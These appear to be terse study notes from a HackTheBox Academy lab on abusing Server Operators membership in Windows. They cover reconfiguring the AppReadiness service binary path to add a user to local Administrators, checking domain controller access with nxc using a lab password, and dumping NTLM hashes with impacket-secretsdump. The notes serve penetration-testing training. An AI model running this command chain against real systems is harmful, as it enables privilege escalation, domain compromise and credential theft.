Server Operators
Query the AppReadiness service (it starts as SYSTEM)
sc qc AppReadinessChecking Service permissions with PsService
PsServicePsService.exe security AppReadinessCheck a group members
net localgroup administratorsModify the service binary path
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"Confirm local admin group membership
net localgroup administratorsConfirm local admin access on domain controller
nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'Retrieving NTLM password hashes from domain controller
impacket-secretsdump server_adm@10.129.43.9 -just-dc-user administratorKey Concepts:
Last updated